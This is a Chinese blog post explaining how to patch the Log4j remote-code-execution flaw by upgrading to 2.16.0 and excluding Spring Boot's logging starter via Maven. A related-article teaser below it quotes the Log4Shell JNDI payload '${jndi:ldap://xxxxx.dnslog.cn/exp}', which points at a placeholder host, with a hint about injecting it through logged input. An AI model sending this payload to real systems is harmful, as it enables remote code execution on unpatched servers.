怎么解决Log4j漏洞处理方式

最新推荐文章于 2024-05-06 22:39:28 发布
最新推荐文章于 2024-05-06 22:39:28 发布
阅读量1.3k 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/coolclouds/article/details/121966920
版权

java

大家都知道Log4j最近出名了,  我们知道springboot引用了log4j, 但我们一个项目在pom引用了好几十个包, 真的不知道那个包引用了log4j这个鬼东西,  下面的方法比较靠谱的Log4j解决方案之一!

a) 二话不说, 必然引用log4j的2.15-RC2及以上 这里用的2.16

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.16.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.16.0</version>
</dependency>

b) 下面就是排除引用了 

关于包的引用, maven采用优先规则, 最先引用的是最短路径, 但我们还是要慎重下啊

执行 mvn  dependency:tree    列出了所有包的引用树状

mvn  dependency:tree 

看到了吧, 最短路径是我们刚刚引入的,  另外一个是sprint-boot-starter的,  虽然可能是走的最短路径但是我们还是排除下吧,  求个心理安慰. 

在pom.xml文件 Ctrl+F 找到对应引用org.springframework.boot:spring-boot-starter-web, 然后增加exclusions排除引用org.springframework.boot:spring-boot-starter-logging这个包的引用

在次执行 mvn  dependency:tree, 看看还有哪些在引用吧

ccoolclouds
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【渗透测试】log4j漏洞复现和漏洞修复方案
Yb528970805的博客
09-16 1950
2021年12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
全网连夜修复的Log4j漏洞,如何做
superjava_的博客
12-29 2719
Apache Log4j2 远程代码执行漏洞的问题最近闹得沸沸扬扬的,很多人都被大半夜叫起来紧急修复这跟问题。 有很多人在微信上问我:这种漏洞还能怎么修?下次有问题还要再升级版本吗?有没有啥一劳永逸的办法?就没啥办法避免吗? 其实,是有的。有一种技术,可以针对这类漏洞做定向拦截。可以让开发者不用急急忙忙修这个漏洞,甚至你如果完全不想修都可以。 这就是RASP技术。 其实这个技术已经诞生很久了,在安全圈也应用很广泛。应用范围也很广泛了。 RASP RASP 是 Runtime Applicatio
Nessus扫描工具使用.pdf
03-24
NessusScansSettings一个基本扫描的建立自定义扫描策略Nessus的高级扫描方法NessusNessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。
spring-boot-starter-log4j2漏洞修复方式
dhj8933的博客
12-14 4086
spring-boot-starter-log4j2漏洞修复方式
2024年网络安全最全【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程,网络安全教程
最新发布
2401_84263282的博客
05-06 1031
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
【实战】一次简单的log4j漏洞测试
crowsec
12-19 3326
【实战】一次简单的log4j漏洞测试
log4j漏洞产生方法和预防
Koikoi12的博客
12-13 4120
产生方法 https://0xsapra.github.io/website/CVE-2019-17571 核心部分${jndi:ldap://xxxxx.dnslog.cn/exp} 想办法把用户输入的可执行字符串送到这个位置就行了,日志里经常打印请求参数之类用户输入的内容,比如"参数a:<请求的输入 预防 Apache Log4j 远程代码执行漏洞 影响版本 经验证 2.15.0-rc1 版本存在绕过,实际受影响范围如下: Apache Log4j 2.x < 2.15.0-rc2 安全
log4j2.17.2
04-14
此次,我们聚焦于“log4j2.17.2漏洞修复程序包”,深入探讨该版本如何解决这一安全隐患。 Log4j2漏洞(CVE-2021-44228)的本质在于,攻击者可以通过操纵日志输入,触发JNDI(Java Naming and Directory Interface)...
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
12-16
在描述中,“若依框架”是一个基于Spring Boot的开源企业级快速开发平台,它也受到了Log4j漏洞的影响。因此,若依框架的用户需要及时下载并部署log4j2.16.0,以保护他们的系统免受潜在的攻击。通常,更新Log4j2的...
log4j2漏洞检测工具
05-07
为了解决这个问题,专门的Log4j2漏洞检测工具应运而生。 **Log4j2漏洞概述** Log4j2是Apache软件基金会的一个项目,它提供了一个灵活且高性能的日志记录API。然而,在2021年12月初,研究人员发现Log4j2的一个严重...
log4j log4j2 2.15.0漏洞解决
12-10
总结起来,Log4j2 2.15.0通过默认禁用JNDI查找和增加安全限制等方式,有效地解决了“Log4Shell”漏洞。然而,安全是一个持续的过程,开发者需要时刻保持警惕,不断更新和优化安全策略,以应对不断演变的威胁。只有...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
log4j漏洞的产生原因和解决方案,零基础都能看懂
weixin_36469852的博客
12-13 853
核弹级bug Log4j,相信很多人都有所耳闻了,这两天很多读者都在问我关于这个bug的原理等一些问题,今天咱们就专门写一篇文章,一起聊一聊这个核弹级别的bug的产生原理以及怎么防止 产生原因 其实这个主要的原因,和日志有关,日志是应用软件中不可缺少的部分,Apache的开源项目log4j是一个功能强大的日志组件,提供方便的日志记录。 最简单的日志打印 我们看如下场景: 这个场景大家应该很熟悉了,就是用户登录,咱们今天不用关心登录是怎么实现的,只用关心用户名name字段就可以了,代码如下
解决项目中log4j版本漏洞
weixin_43573186的博客
12-29 4017
解决项目中log4j版本漏洞 前言:作为程序员应该都知道最近log4j出现的漏洞问题,讲一讲我所在的公司,其实领导在log4j被爆出存在漏洞的当天就在群里说了这个事,并且让我们把自己负责的系统都检查一遍,有使用到log4j存在漏洞的版本都要进行更新(因为有些版本还没爆出存在安全问题),但是当时都没什么人去注意,结果直到上周末,我们组负责的一个缴费系统出现不能缴费的情况,才发现是中了病毒。然后领导们开始极度重视,专门安排人监督我们来更新log4j版本。 废话不多说了,讲一下我负责的系统更新方式: 首先,一般
Log4j高危漏洞原理及复现
qq_51302564的博客
12-15 1万+
Log4j高危漏洞原理及复现 漏洞检测||复现环境 查看JDK版本,发现版本小于1.8u121 图3-7 查看JDK版本 查看log4j2版本,发现版本在2.x <= 2.14.1内 图3-8 查看log4j2版本 查看代码,发现存在log4j2相关的lookup语句 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w9LtKVys-1639577266999)(C:\Users\BLACKF~1\AppData\Local\Temp\ksohtml\wps3AFF.
盘点:Log4j 漏洞带来的深远影响
mxy2404830的博客
12-23 3405
上周,Log4j 漏洞颠覆了互联网,影响是巨大。攻击者也已经开始利用该漏,到目前为止,Uptycs 研究人员已经观察到与 coinminers、DDOS 恶意软件和一些勒索软件变种相关的攻击,这些攻击积极利用了此漏洞。 未来几天勒索软件攻击的规模可能会增加。由于该漏洞非常严重,因此可能还会发现一些可以绕过当前补丁级别或修复程序的变体。因针对这种攻击持续监控和强化系统是极其重要的。 Uptycs 此前在博客中为其客户分享了有关补救和检测步骤的详细信息 。并讨论了攻击者利用 Log4j 漏洞的各种恶意软件类
Apache Log4j2漏洞
四问四不知的博客
12-20 2332
序言 最近又爆出Apache Log4j2的大漏洞(CVE-2021-44228),很多使用了该框架的应用都受到了影响。影响范围极大,攻击者只需要向目标输入一段代码,不需要用户执行任何多余操作即可触发该漏洞,使攻击者可以远程控制受害者服务器。 由于Log4j 是目前全球使用最广泛的Java日志框架之一。该漏洞还影响着很多开源组件,如 Apache Struts2、Apache Solr、Apache Druid、Apache Flink 等。因为该漏洞利用方式简单,一旦有攻击者利用该漏洞,就可以在目标服
记一次Log4j2漏洞处理
qq644266189的博客
12-14 1050
漏洞描述: Log4j是Apache旗下的一款Java开源日志记录工具,在Java生态圈中得到广泛应用。本次漏洞使攻击者可利用Log4j2进行跳过验证,进行远程代码执行;由于Log4j2的广泛应用于java应用中,所以该次漏洞影响非常严重。 涉及版本: Log4j2 2.0-2.14都受影响 漏洞解决: 关键:通过升级版本为安全版本,经查验安全版本为2.15.0 对于漏洞,官方紧急发布了两个安全的测试版本2.15.0-rc1与2.1...
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7816
log4j漏洞原理和靶场复现

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值